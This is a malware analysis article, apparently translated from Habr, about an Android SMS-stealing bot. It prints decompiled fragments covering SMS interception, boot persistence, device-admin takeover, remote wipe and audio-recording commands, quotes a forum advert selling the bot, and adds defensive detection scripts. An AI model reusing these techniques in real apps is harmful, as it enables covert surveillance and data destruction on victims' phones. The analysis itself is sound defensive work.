
Analysis sms-bot for Android. Part I


Introduction
Analysis of an SMS bot for Android, with the aim of identifying how it works and what interesting functionality it carries.
The bot is implemented for the Android platform; the procedure for unpacking the application is as follows:

Tools:


Meet the manifest

Having opened the manifest, we immediately turn our attention to the system permissions that seemed most interesting to me:
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.WRITE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />

So, our bot reads the phone state, handles calls, writes to external storage, writes / reads / receives / sends SMS, reads the contacts database and records audio. Interesting…

Further on in the manifest we see the following code:
    …
    <service android:name="com.soft360.iService.AService" android:enabled="true" android:exported="false" />
    <service android:name="com.soft360.iService.webService" android:enabled="true" android:exported="false" />
    <receiver android:name="com.soft360.iService.Alarm" android:enabled="true" android:exported="false" />
    <receiver android:name="com.soft360.iService.AutoStart" android:enabled="true" android:exported="false">
        <intent-filter>
            <action android:name="android.intent.action.BOOT_COMPLETED" />
        </intent-filter>
    </receiver>
    <activity android:theme="@*android:style/Theme.Translucent" android:name="com.BioTechnology.iClientsService.IncomingCallActivity" />
    <receiver android:name="com.soft360.Receiver.MyPhoneReceiver">
        <intent-filter>
            <action android:name="android.intent.action.PHONE_STATE" />
        </intent-filter>
    </receiver>
    <receiver android:name="com.soft360.web.MyAdmin" android:permission="android.permission.BIND_DEVICE_ADMIN">
        <intent-filter>
            <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
        </intent-filter>
        <meta-data android:name="android.app.device_admin" android:resource="@layout/policies" />
    </receiver>
    …


We see that the following are declared:

The analysis of the manifest is over. I looked through the resource files and found nothing interesting. Now let's proceed to the analysis of the decompiled Java code.
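As an added example (not from the article or the bot), a small triage script that looks for the same combination in any AndroidManifest.xml: SMS permissions, a BOOT_COMPLETED receiver, a PHONE_STATE receiver and a device-admin receiver. The sample manifest embedded at the end is constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = "{%s}name" % ANDROID_NS
PERM_ATTR = "{%s}permission" % ANDROID_NS

# Permissions and receiver actions the article singles out in the bot's manifest.
SMS_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
             "android.permission.SEND_SMS", "android.permission.WRITE_SMS"}
OTHER_PERMS = {"android.permission.RECEIVE_BOOT_COMPLETED", "android.permission.READ_CONTACTS",
               "android.permission.RECORD_AUDIO", "android.permission.READ_PHONE_STATE"}
ACTIONS = {"android.intent.action.BOOT_COMPLETED", "android.intent.action.PHONE_STATE",
           "android.app.action.DEVICE_ADMIN_ENABLED"}

def triage_manifest(xml_text):
    """Return (suspicious permissions, receiver actions, names of device-admin receivers)."""
    root = ET.fromstring(xml_text)
    perms = {p.get(NAME) for p in root.iter("uses-permission")} & (SMS_PERMS | OTHER_PERMS)
    actions, admins = set(), []
    for recv in root.iter("receiver"):
        actions |= {a.get(NAME) for a in recv.iter("action")} & ACTIONS
        if recv.get(PERM_ATTR) == "android.permission.BIND_DEVICE_ADMIN":
            admins.append(recv.get(NAME))
    return perms, actions, admins

def is_sms_bot_like(xml_text):
    """Flag the combination seen above: SMS interception + boot persistence + device admin."""
    perms, actions, admins = triage_manifest(xml_text)
    return ("android.permission.RECEIVE_SMS" in perms
            and "android.intent.action.BOOT_COMPLETED" in actions
            and bool(admins))

# Constructed sample manifest (not the bot's own file) showing the same pattern.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.RECEIVE_SMS" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
  <application>
    <receiver android:name=".AutoStart">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED" /></intent-filter>
    </receiver>
    <receiver android:name=".MyAdmin" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /></intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    print(triage_manifest(SAMPLE_MANIFEST), is_sms_bot_like(SAMPLE_MANIFEST))
```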
Analyzing the code

The bot consists of at least 19 main working classes. During the analysis I identified the most essential and interesting classes, the ones responsible for the bot's malicious activity:


MainActivity.java

Before we start analyzing the classes listed above, let's take a look at the MainActivity class and see what's interesting there.
    Intent localIntent1 = new Intent("android.provider.Telephony.SMS_RECEIVED");
    localIntent1.setClass(this, SmsReciever.class);
    sendBroadcast(localIntent1);
    Intent localIntent2 = new Intent(this, AService.class);
    startService(localIntent2);
    Intent localIntent3 = new Intent(this, webService.class);
    startService(localIntent3);


Immediately on start-up, the bot tries to:


Further on in the code we see another interesting thing:
    Intent localIntent4 = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    localIntent4.putExtra("android.app.extra.DEVICE_ADMIN", this.compName);
    localIntent4.putExtra("android.app.extra.ADD_EXPLANATION", "Additional text explaining why this needs to be added.");
    startActivityForResult(localIntent4, 1);

It is clear that the bot is trying to add itself as a device administrator.

Attention! Diversionary maneuver
Next, MainActivity.java runs many different templates to distract the user, pretending to be an application that supposedly scans the phone for all sorts of mobile vulnerabilities and supposedly updates itself. And all this beauty is presented in Portuguese, with a reference to some Australian bank.

In fact, there is no phone scanning, certificate downloading, etc. Only dummy templates are launched that mimic vigorous activity. Here is an example of such a dummy (decompiler output tidied and closing braces restored):
    private class template4_task extends AsyncTask<Void, Void, Void> {
        private template4_task() {}

        protected Void doInBackground(Void... paramVarArgs) {
            try {
                // The whole "scan" is a five-second pause; no real work is done.
                TimeUnit.SECONDS.sleep(5L);
            } catch (InterruptedException localInterruptedException) {
                localInterruptedException.printStackTrace();
            }
            return null;
        }
    }

An AsyncTask starts, with a timer that simply runs and ... does nothing!

AutoStart Receiver

This receiver starts working immediately after the phone boots and performs the same actions as MainActivity:
    Intent localIntent = new Intent("android.provider.Telephony.SMS_RECEIVED");
    localIntent.setClass(paramContext, SmsReciever.class);
    paramContext.sendBroadcast(localIntent);
    paramContext.startService(new Intent(paramContext, AService.class));
    paramContext.startService(new Intent(paramContext, webService.class));


Service AService

This service registers the SmsReciever receiver with an intent filter (set to a high priority), and that receiver in turn will receive and process all incoming SMS messages (more on it a bit later).
Here is the evidence:
    final IntentFilter smsFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    …
    this.smsFilter.setPriority(999);
    this.smsReceiver = new SmsReciever();
    registerReceiver(this.smsReceiver, this.smsFilter);


SmsReciever and smsParser

Now let's move on to the more interesting pieces of the bot's code: the SmsReciever receiver and a separate class for recognizing commands arriving via SMS and via the web admin panel.

I quote a heavily stripped-down piece of code from SmsReciever:
    public void onReceive(Context paramContext, Intent paramIntent) {
        …
        for (;;) {
            …
            {
                smsParser localsmsParser = smsParser.getInstance();
                localsmsParser.setSMSMessage(localSmsMessage.getMessageBody());
                if (localsmsParser.isStartSMS()) {
                    localdbActions.setStartSMS();
                }
                …
                if (localsmsParser.isStopSMS()) {
                    localdbActions.setStopSMS();
                } else if (localsmsParser.isStartCALL()) {
                    try {
                        localdbActions.setStartCALL();
                    } …
                } else if (localsmsParser.isStopCALL()) {
                    try {
                        localdbActions.setStopCALL();
                    } …
                } else if (localsmsParser.isSmsList()) {
                    localdbActions.sent_smslist_to_server();
                } else if (localsmsParser.isCallList()) {
                    localdbActions.sent_Call_Details();
                } else if (localsmsParser.isStartRecord()) {
                    if (webServiceRobot.AR != null) {
                        try {
                            webServiceRobot.AR.stop();
                            webServiceRobot.AR = null;
                            return;
                        } …
                    if (localsmsParser.isStopRecord()) {
                        localdbActions.setStopRecord();
                        if (webServiceRobot.AR == null) {
                            break;
                        }
                        try {
                            webServiceRobot.AR.stop();
                            webServiceRobot.AR = null;
                        } …
                    }
                }
                if (localsmsParser.isSmsSend()) {
                    localdbActions.SendSMS(localSmsMessage.getMessageBody());
                } else if (localsmsParser.isContactList()) {
                    localdbActions.sent_call_list_details();
                } else {
                    if (!localsmsParser.isWipeData()) {
                        break label592;
                    }
                    localdbActions.make_wipe_data();
                    ...
                    paramContext.startService(new Intent(paramContext, AService.class));
                    paramContext.startService(new Intent(paramContext, webService.class));
                    …


I think detailed comments are not needed. From the code it is clear that:


localsmsParser is the key element. So let's look further at the smsParser class:
    private static final String COMMAND_GET_CALL_LIST = "call list";
    private static final String COMMAND_GET_CONTACT_LIST = "contact list";
    private static final String COMMAND_GET_SMS_LIST = "sms list";
    private static final String COMMAND_PING = "ping";
    private static final String COMMAND_SEND_SMS = "sendSMS";
    private static final String COMMAND_START_RECORD = "start record";
    private static final String COMMAND_STOP_RECORD = "stop record";
    private static final String COMMAND_WIPE_DATA = "wipe data";
    private static final String startCALL = "call start";
    private static final String startSMS = "sms start";
    private static final String stopCALL = "call stop";
    private static final String stopSMS = "sms stop";
    private static final String changeNUM = "change num";
    private static final int COM_CALL_LIST = 6;
    private static final int COM_CONTACT_LIST = 10;
    private static final int COM_NULL = -1;
    private static final int COM_PING = 12;
    private static final int COM_SEND_SMS = 9;
    private static final int COM_SMS_LIST = 5;
    private static final int COM_START_CALL = 3;
    private static final int COM_START_RECORD = 7;
    private static final int COM_START_SMS = 1;
    private static final int COM_STOP_CALL = 4;
    private static final int COM_STOP_RECORD = 8;
    private static final int COM_STOP_SMS = 2;
    private static final int COM_WIPE_DATA = 11;
    private static smsParser parser = null;

From these constants we can understand what functions our bot can perform. The same commands are given in both string and numeric form. Most likely there is a check on the source from which a command arrives (SMS or the Internet).
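As an added example (not from the article or the bot), a detector that scans an SMS log for the command vocabulary quoted above and maps each hit to the bot's numeric code. The matching rules (case-insensitive exact match, trailing arguments only after "sendSMS") and the log format are assumptions; the log lines are constructed.

```python
import re

# Command vocabulary copied from the smsParser constants above (string -> numeric code).
# "change num" (changeNUM) has no COM_ code among the quoted constants, so it maps to COM_NULL.
COM_NULL = -1
COMMANDS = {
    "sms start": 1, "sms stop": 2, "call start": 3, "call stop": 4,
    "sms list": 5, "call list": 6, "start record": 7, "stop record": 8,
    "sendsms": 9, "contact list": 10, "wipe data": 11, "ping": 12,
    "change num": COM_NULL,
}

def classify_command(body):
    """Return the numeric command code for an SMS body, or None if it is not a bot command.

    Assumption (not stated by the article): the whole trimmed body must equal a command,
    case-insensitively; only "sendSMS" may carry trailing arguments, since the bot
    passes the entire message body to SendSMS().
    """
    text = re.sub(r"\s+", " ", body.strip().lower())
    if text in COMMANDS:
        return COMMANDS[text]
    if text.startswith("sendsms "):
        return COMMANDS["sendsms"]
    return None

def scan_sms_log(lines):
    """Scan constructed 'timestamp;sender;body' lines; return hits as (sender, body, code)."""
    hits = []
    for line in lines:
        parts = line.split(";", 2)
        if len(parts) != 3:
            continue  # malformed line, skip rather than fail
        _, sender, body = parts
        code = classify_command(body)
        if code is not None:
            hits.append((sender, body, code))
    return hits

# Constructed sample log: three control-number commands mixed with ordinary messages.
SAMPLE_LOG = [
    "2014-07-01 10:00:01;+77010000000;hi, call me when you can",
    "2014-07-01 10:03:12;+77019999999;sms start",
    "2014-07-01 10:05:40;+77019999999;sendSMS +77012345678 hello",
    "2014-07-01 10:09:02;+77010000000;Did you call Start yet?",
    "2014-07-01 10:12:55;+77019999999;wipe data",
]

if __name__ == "__main__":
    for hit in scan_sms_log(SAMPLE_LOG):
        print("sender=%s code=%d body=%r" % (hit[0], hit[2], hit[1]))
```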

webServiceRobot

This class is similar to SmsReciever, with the difference that it handles HTTP requests. Almost all the same actions are performed:

Plus sending full device information to the server.

Findings

Well, we have considered the main pieces of code. Now let's draw conclusions. The bot is well written and performs a very extensive set of functions. Here is the announcement from one of the forums where this bot is sold:
Dear Sirs, we are pleased to offer you a bot for mobile devices. At the moment the bot is implemented for the Android operating system; we are also happy to inform you that development for Blackberry is in full swing and the first beta versions will appear in the coming month. All customers of the Android bot will get significant discounts on the Blackberry one.
Now, briefly, how it works, for those who do not know: after installation on a mobile device, the application instantly reports to a convenient web panel via 3G or Wi-Fi, and also sends an SMS to the control number with the text I am (ICCID + MODEL PHONE). Our bot is implemented in such a way that after entering the system the user continues to quietly use his phone; all functions remain available to him in normal mode. Unlike the famous Perkele, we are not tailored to specific interception numbers; our bot works through a command system. Commands are given in whatever way is convenient for you, either from the web panel when Internet is available, or by SMS from the control number.


Functional:


So, this software is for sale: the price of the bot is 4k, and the complete package includes the admin panel configured on your server + a control web number + an .apk file with a unique interface designed to your needs, as well as ongoing product support. We are also ready to consider options for renting and working together for a percentage (please do not knock if you do not have injects and do not know how to use them). For more information, write me your jabber in a PM for contact; GPG and OTR are essential.

Dear Sirs. An UPDATE has been released for Android. All customers, knock for the update; we also look forward to new customers.
What's new?
  • Now our application is extremely difficult to delete. On installation the software requests device admin rights; if the holder grants them, the application becomes extremely tenacious, the services restart and you will not lose this bot. If they are not granted, the application continues to work as before. For your convenience, an indicator has appeared in the admin panel showing whether admin rights are granted or not.
  • If you have admin rights, it is possible to reset the phone to factory settings with a command


Detection names used by anti-virus vendors for this SMS bot: Trojan-Spy.AndroidOS.Zbot.a / Android.Smssniffer / Android / SpySMS / AndroidOS_SMSREP.B

Nabiev Nurlan (Kazakhstan), Department of Cybercrime Investigation, PentestIT

Source: https://habr.com/ru/post/231425/
